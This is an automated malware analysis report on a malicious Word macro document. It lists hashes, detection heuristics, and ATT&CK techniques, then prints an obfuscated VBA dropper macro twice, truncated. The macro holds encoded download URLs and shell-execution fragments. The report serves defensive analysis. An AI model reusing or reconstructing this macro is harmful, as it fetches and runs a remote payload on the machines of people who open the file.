Office (OLE) malware analysis — malicious · bea874dcaeeb584e

MALICIOUS

Office (OLE)

125.0 KB Created: 2018-02-16 23:38:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: f435bf778f96de1131a714c3efa78058 SHA-1: f4755e56c25acc3a6e2bfdc64471e1a8726010c9 SHA-256: bea874dcaeeb584ebc8cbf157fb9dbc3ff0db8e39f9a645d10bdccf3af7e3fb5

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample is a malicious Office document containing a VBA macro. The macro utilizes a Shell() call and attempts to download a payload from the reconstructed URL "http://chirsA6H+A6Hb+rsboccqawmhWjWvTSqaKhqMduAqCNDVT/rRA6H+A6Hielrsb+rsbh/?httrsb+rsGO4+GO4bp://chirsA6H+A6Hb+rsboccqawmhWjWvTSqaKhqMduAqCNDVT". This indicates an attempt to download and execute a second-stage payload, consistent with a dropper malware.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6450812-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6450812-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 33850 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	33850 bytes
SHA-256: `91747f38f88a661ad9482ad40402e95576916d62988aea0178ff3aad8ab24ee9`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "BzisiPADm" Function GmkzkbLI() On Error Resume Next OhrswVh = 3347024 + Atn(LUnEWJXEG) / ZjktAHdnDVivm - Sgn(DSrZAfvG * Log(icNjWUfwZ)) / (7305281 - wdnhwa * QhwrQiVADRzEa - SICQnbHSYYEJfT) GrlBpEtwC = 5024970 + Atn(KaZnfYcrMi) / VROzVL - Sgn(fVlQLz * Log(zJXmGCCaYGWi)) / (7466683 - tfLEIQlB * ZjzVnE - uPaDiPEEFcHus) OiCRcJhRpUO = 1514258 + Atn(rYsmpZMDiw) / zwDIhOViMHDjii - Sgn(GzjIrICzrZ * Log(BPTiMsEmQG)) / (290977 - utYNvUnoJIOSNW * HnwBLjENG - dvLfwNU) GKlXKfvt = (UirwXKYazhVEl) + yHBjksbJKSUgsssd("RHGrsb+rsbry{P0tYrsb+rsbYUGO4+GO4.uSaDo1HfWnrsb+rsbl1HGO4+GO4rGO4+GO4sb+rsbfOrsb+rsbadrsb+rsbFI1Hfle'+'uSa(rsb+rsbPA6TLUqUtVCaVOTIjftszjvqf", 4, 114) KTqqUNaEaa = 3714341 + Atn(qMqfR) / RZbJN - Sgn(uNKlKosqZGzlU * Log(JIFtiz)) / (8941308 - PpukAro * cbFwG - KDHIGcjjNFKL) FlzkKZL = 8668761 + Atn(TiaPzf) / UqanABViYjVzWw - Sgn(lZqRi * Log(cpZpwfjuApw)) / (5158020 - qNhVFaKEpZpM * KRwBZiwSr - AwCWm) cQqwOC = 6892949 + Atn(qWYhHoDEk) / YanQkcbUSzwQQ - Sgn(WwMhWDEXVR * Log(SnpCcsworXr)) / (948619 - QVaBTlZaGuK * cWhhmA - ViRpmR) lLAkd = (EkStABVpSzz) + yHBjksbJKSUgsssd("zpLWj/evrA6H+A'+'6Hsb+rsbenersb+rsbmenrsb+rsbtrsb+rsb-dA6H+A6Hrsb+rsbirersb+rsbct.fr/rRA6H+A6Hielrsb+rsbh/?httrsb+rsGO4+GO4bp://chirsA6H+A6Hb+rsboccqawmhWjWvTSqaKhqMduAqCNDVT", 6, 143) JwuQf = 104526 + Atn(PHEXljBwf) / jijXwjofQzGf - Sgn(jwWda * Log(zHYoim)) / (3969774 - jsKaRWpTZ * UJfEw - AQjDUaPFbs) RzQSilFHCm = 6525109 + Atn(LpzkdLFnFZo) / OQXUJQ - Sgn(tJvoSDRAId * Log(wYoJH)) / (6917811 - kjTzL * bbZpDDvvL - oWPBfhML) OzMMVmQ = 9307757 + Atn(AaPVEI) / PZkHuzYNrdbw - Sgn(iJnHzn * Log(iZDTICBWAMEku)) / (3110017 - WbKuYrnoDkP * brnIVRQEqVQzr - BNiZqBpCmLwFOA) kLvzpkUNsVj = (jrILsit) + yHBjksbJKSUgsssd("OMafkpqabNJGTapEprs'+'b+rsbZ hr'+'GO4+GO4sb+rsbttp://eA6H+A6Hversb+rsGO4+GO4bnrsb+rsbGO4+GO4irsb+rsbngrsb+rsbA6H+A6Hcarsb+rsblersb+rsbnrs'+'b+rsbdar.com/cA6H+A6HCC7zrsb+rsbIrsNwpSLRwOVKVDFi", 17, 159) tCjzu = 5731382 + Atn(NCZFbMQCQJFWh) / fVXAbr - Sgn(XdNlBkClK * Log(bVpfJBZk)) / (8379302 - ROCjicFX * SZhmWq - LUabOQFpd) rnvpiK = 31091 + Atn(aWUzQjZFIadGY) / fisuujSokpE - Sgn(QDAJNG * Log(kiAmUJwNRh)) / (9576409 - NCwimMujQal * fsGTVEzNXboA - rXkwVBHnGr) jtCqqpN = 1400843 + Atn(UOwSXNJs) / HbCisMh - Sgn(LlOvEupJnvZ * Log(wYBzzAqDvA)) / (2724958 - HPjviRdoZC * FtYQTGIjSkOQja - frVdp) aQJYEQfV = (KLCcpaJ) + yHBjksbJKSUgsssd("hErGO4+G'+'O4cA'+'6H+A6H + Bprsb+rGOA6H+A6H4+GO4sbZVkrsb+rsb0BpGO4+GO4Z + Prsb+rsb0rsb+rsbtrsb+rsbNSB +rsb+rsb GO'+'4+GO4(BpZrsb+rsb.rsb+rsbeGO4+GO4A6H+A6HxBrsb+rsbpZ+BpZersb+A6H+A6HrsbBpZ);forsb+rsbtzwCCViRKMFSauLGtzosRzafrbjrWqSja", 4, 196) wwiASCqoG = 9448741 + Atn(QvutwAVimlSv) / khJkcIM - Sgn(OAzIVHdzDIz * Log(CuboupKYwjj)) / (3502480 - hrOwqH * kECvvkd - shidTPKpFVpmw) zJQGtWTw = 7852054 + Atn(iUjznPOAMAk) / zsjtJLRjPADwuX - Sgn(JbAUP * Log(UXbOlqddjVciSM)) / (9429747 - bjahIUiQi * QNFZL - VBdVFiYVnCi) iAwzS = 5889235 + Atn(PbKEkzUuim) / sKfjaPXHKwNRjb - Sgn(wIFtFmzq * Log(dFJVZrln)) / (2791465 - cvwruYfbUi * KadQC - oojNsTN) wSsaMnA = (RkFvcwGbjW) + yHBjksbJKSUgsssd("osnljzFGSjtkswKsb+rsbnersb+rsbBpZrsb+rsbA6H+A6H+BpZrsb+rslmUnTFzkBaYjBlRJTvJFh", 16, 42) riwtNsadpk = 4172543 + Atn(KfLQSffEXf) / whQkbloZRduBTc - Sgn(UitFvd * Log(GCNIzkpa)) / (9381467 - nNbVpO * MclDwQdsoLKALS - UfbNWToEkrj) GqYjrwWrI = 6895182 + Atn(GAmiQws) / rOJmkPJY - Sgn(ZksDtvtcsc * Log(XAMPjOmnZ)) / (6107776 - PZQcQRblDff * SwrKME - CYUVvqCtFVdVz) JYMSEPru = 9779883 + Atn(VSnRibBGYrsv) / TpDZijdLuDUlO - Sgn(WQaJjHdaY * Log(vZQBSvdDv)) / (1479899 - QREnSVdbPS * QDfqwiLnRtQ - dIPctzaRpGz) TNDCAsYcopV = (aCFwXzQL) + yHBjksbJKSUgsssd("tbpnjnmahzqjvbHY+[cHAr]83+[cHAr]GO4+GO497),[cHAr]34-rePLAcE ([cHAA6H+A6Hr]80+[cGO4+GO4HAr]48+[cHArGO4+G'+'O4]116),[cHA6ubbOtsn", 17, 104) viBTMJh = 7257864 + Atn(iDtkboBqJG) / rcLwCRtGa - Sgn(zCGQCiZ * Log(Q ... (truncated)

SHA-256: 91747f38f88a661ad9482ad40402e95576916d62988aea0178ff3aad8ab24ee9

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "BzisiPADm"
Function GmkzkbLI()
On Error Resume Next
OhrswVh = 3347024 + Atn(LUnEWJXEG) / ZjktAHdnDVivm - Sgn(DSrZAfvG * Log(icNjWUfwZ)) / (7305281 - wdnhwa * QhwrQiVADRzEa - SICQnbHSYYEJfT)
GrlBpEtwC = 5024970 + Atn(KaZnfYcrMi) / VROzVL - Sgn(fVlQLz * Log(zJXmGCCaYGWi)) / (7466683 - tfLEIQlB * ZjzVnE - uPaDiPEEFcHus)
OiCRcJhRpUO = 1514258 + Atn(rYsmpZMDiw) / zwDIhOViMHDjii - Sgn(GzjIrICzrZ * Log(BPTiMsEmQG)) / (290977 - utYNvUnoJIOSNW * HnwBLjENG - dvLfwNU)
GKlXKfvt = (UirwXKYazhVEl) + yHBjksbJKSUgsssd("RHGrsb+rsbry{P0tYrsb+rsbYUGO4+GO4.uSaDo1HfWnrsb+rsbl1HGO4+GO4rGO4+GO4sb+rsbfOrsb+rsbadrsb+rsbFI1Hfle'+'uSa(rsb+rsbPA6TLUqUtVCaVOTIjftszjvqf", 4, 114)
KTqqUNaEaa = 3714341 + Atn(qMqfR) / RZbJN - Sgn(uNKlKosqZGzlU * Log(JIFtiz)) / (8941308 - PpukAro * cbFwG - KDHIGcjjNFKL)
FlzkKZL = 8668761 + Atn(TiaPzf) / UqanABViYjVzWw - Sgn(lZqRi * Log(cpZpwfjuApw)) / (5158020 - qNhVFaKEpZpM * KRwBZiwSr - AwCWm)
cQqwOC = 6892949 + Atn(qWYhHoDEk) / YanQkcbUSzwQQ - Sgn(WwMhWDEXVR * Log(SnpCcsworXr)) / (948619 - QVaBTlZaGuK * cWhhmA - ViRpmR)
lLAkd = (EkStABVpSzz) + yHBjksbJKSUgsssd("zpLWj/evrA6H+A'+'6Hsb+rsbenersb+rsbmenrsb+rsbtrsb+rsb-dA6H+A6Hrsb+rsbirersb+rsbct.fr/rRA6H+A6Hielrsb+rsbh/?httrsb+rsGO4+GO4bp://chirsA6H+A6Hb+rsboccqawmhWjWvTSqaKhqMduAqCNDVT", 6, 143)
JwuQf = 104526 + Atn(PHEXljBwf) / jijXwjofQzGf - Sgn(jwWda * Log(zHYoim)) / (3969774 - jsKaRWpTZ * UJfEw - AQjDUaPFbs)
RzQSilFHCm = 6525109 + Atn(LpzkdLFnFZo) / OQXUJQ - Sgn(tJvoSDRAId * Log(wYoJH)) / (6917811 - kjTzL * bbZpDDvvL - oWPBfhML)
OzMMVmQ = 9307757 + Atn(AaPVEI) / PZkHuzYNrdbw - Sgn(iJnHzn * Log(iZDTICBWAMEku)) / (3110017 - WbKuYrnoDkP * brnIVRQEqVQzr - BNiZqBpCmLwFOA)
kLvzpkUNsVj = (jrILsit) + yHBjksbJKSUgsssd("OMafkpqabNJGTapEprs'+'b+rsbZ hr'+'GO4+GO4sb+rsbttp://eA6H+A6Hversb+rsGO4+GO4bnrsb+rsbGO4+GO4irsb+rsbngrsb+rsbA6H+A6Hcarsb+rsblersb+rsbnrs'+'b+rsbdar.com/cA6H+A6HCC7zrsb+rsbIrsNwpSLRwOVKVDFi", 17, 159)
tCjzu = 5731382 + Atn(NCZFbMQCQJFWh) / fVXAbr - Sgn(XdNlBkClK * Log(bVpfJBZk)) / (8379302 - ROCjicFX * SZhmWq - LUabOQFpd)
rnvpiK = 31091 + Atn(aWUzQjZFIadGY) / fisuujSokpE - Sgn(QDAJNG * Log(kiAmUJwNRh)) / (9576409 - NCwimMujQal * fsGTVEzNXboA - rXkwVBHnGr)
jtCqqpN = 1400843 + Atn(UOwSXNJs) / HbCisMh - Sgn(LlOvEupJnvZ * Log(wYBzzAqDvA)) / (2724958 - HPjviRdoZC * FtYQTGIjSkOQja - frVdp)
aQJYEQfV = (KLCcpaJ) + yHBjksbJKSUgsssd("hErGO4+G'+'O4cA'+'6H+A6H + Bprsb+rGOA6H+A6H4+GO4sbZVkrsb+rsb0BpGO4+GO4Z + Prsb+rsb0rsb+rsbtrsb+rsbNSB +rsb+rsb GO'+'4+GO4(BpZrsb+rsb.rsb+rsbeGO4+GO4A6H+A6HxBrsb+rsbpZ+BpZersb+A6H+A6HrsbBpZ);forsb+rsbtzwCCViRKMFSauLGtzosRzafrbjrWqSja", 4, 196)
wwiASCqoG = 9448741 + Atn(QvutwAVimlSv) / khJkcIM - Sgn(OAzIVHdzDIz * Log(CuboupKYwjj)) / (3502480 - hrOwqH * kECvvkd - shidTPKpFVpmw)
zJQGtWTw = 7852054 + Atn(iUjznPOAMAk) / zsjtJLRjPADwuX - Sgn(JbAUP * Log(UXbOlqddjVciSM)) / (9429747 - bjahIUiQi * QNFZL - VBdVFiYVnCi)
iAwzS = 5889235 + Atn(PbKEkzUuim) / sKfjaPXHKwNRjb - Sgn(wIFtFmzq * Log(dFJVZrln)) / (2791465 - cvwruYfbUi * KadQC - oojNsTN)
wSsaMnA = (RkFvcwGbjW) + yHBjksbJKSUgsssd("osnljzFGSjtkswKsb+rsbnersb+rsbBpZrsb+rsbA6H+A6H+BpZrsb+rslmUnTFzkBaYjBlRJTvJFh", 16, 42)
riwtNsadpk = 4172543 + Atn(KfLQSffEXf) / whQkbloZRduBTc - Sgn(UitFvd * Log(GCNIzkpa)) / (9381467 - nNbVpO * MclDwQdsoLKALS - UfbNWToEkrj)
GqYjrwWrI = 6895182 + Atn(GAmiQws) / rOJmkPJY - Sgn(ZksDtvtcsc * Log(XAMPjOmnZ)) / (6107776 - PZQcQRblDff * SwrKME - CYUVvqCtFVdVz)
JYMSEPru = 9779883 + Atn(VSnRibBGYrsv) / TpDZijdLuDUlO - Sgn(WQaJjHdaY * Log(vZQBSvdDv)) / (1479899 - QREnSVdbPS * QDfqwiLnRtQ - dIPctzaRpGz)
TNDCAsYcopV = (aCFwXzQL) + yHBjksbJKSUgsssd("tbpnjnmahzqjvbHY+[cHAr]83+[cHAr]GO4+GO497),[cHAr]34-rePLAcE  ([cHAA6H+A6Hr]80+[cGO4+GO4HAr]48+[cHArGO4+G'+'O4]116),[cHA6ubbOtsn", 17, 104)
viBTMJh = 7257864 + Atn(iDtkboBqJG) / rcLwCRtGa - Sgn(zCGQCiZ * Log(Q
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.